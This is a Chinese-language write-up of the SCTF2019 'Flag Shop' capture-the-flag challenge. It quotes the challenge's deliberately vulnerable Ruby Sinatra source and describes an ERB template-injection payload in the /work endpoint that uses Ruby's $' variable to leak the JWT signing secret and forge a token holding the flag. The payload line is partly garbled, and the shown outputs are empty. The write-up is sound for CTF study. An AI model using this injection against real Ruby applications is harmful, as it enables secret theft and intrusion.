[SCTF2019]Flag Shop

[SCTF2019]Flag Shop

解题

1. 使用robots.txt，看到/static/secretkey.txt，但是源码在filebak中，不知道为什么

   require 'sinatra'
   require 'sinatra/cookies'
   require 'sinatra/json'
   require 'jwt'
   require 'securerandom'
   require 'erb'
   
   set :public_folder, File.dirname(__FILE__) + '/static'
   
   FLAGPRICE = 1000000000000000000000000000
   ENV["SECRET"] = SecureRandom.hex(64)
   
   configure do
     enable :logging
     file = File.new(File.dirname(__FILE__) + '/../log/http.log',"a+")
     file.sync = true
     use Rack::CommonLogger, file
   end
   
   get "/" do
     redirect '/shop', 302
   end
   
   get "/filebak" do
     content_type :text
     erb IO.binread __FILE__
   end
   
   get "/api/auth" do
     payload = { uid: SecureRandom.uuid , jkl: 20}
     auth = JWT.encode payload,ENV["SECRET"] , 'HS256'
     cookies[:auth] = auth
   end
   
   get "/api/info" do
     islogin
     auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
     json({uid: auth[0]["uid"],jkl: auth[0]["jkl"]})
   end
   
   get "/shop" do
     erb :shop
   end
   
   get "/work" do
     islogin
     auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
     auth = auth[0]
     unless params[:SECRET].nil?
       if ENV["SECRET"].match("#{params[:SECRET].match(/[0-9a-z]+/)}")
         puts ENV["FLAG"]
       end
     end
   
     if params[:do] == "#{params[:name][0,7]} is working" then
   
       auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
       auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
       cookies[:auth] = auth
       ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result
   
     end
   end
   
   post "/shop" do
     islogin
     auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
   
     if auth[0]["jkl"] < FLAGPRICE then
   
       json({title: "error",message: "no enough jkl"})
     else
   
       auth << {flag: ENV["FLAG"]}
       auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
       cookies[:auth] = auth
       json({title: "success",message: "jkl is good thing"})
     end
   end
   
   
   def islogin
     if cookies[:auth].nil? then
       redirect to('/shop')
     en
   end

2. 语法为Ruby的语法所以思路为Ruby模版注入。

     if params[:do] == "#{params[:name][0,7]} is working" then
    
       auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
       auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
       cookies[:auth] = auth
       ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result

   发现secret的输出方式，其中ruby预定义变量里，在$'后会最后一次匹配字符串，所以进入代码后is working不被ruby代码解析，然后使用ERB模版进行注入。

   所以传入/work?SECRET=&name=<%= ′ '%>&do=<%= ′'%>is working

   得到：
   

   构造后，

   

将jwt解码得到flag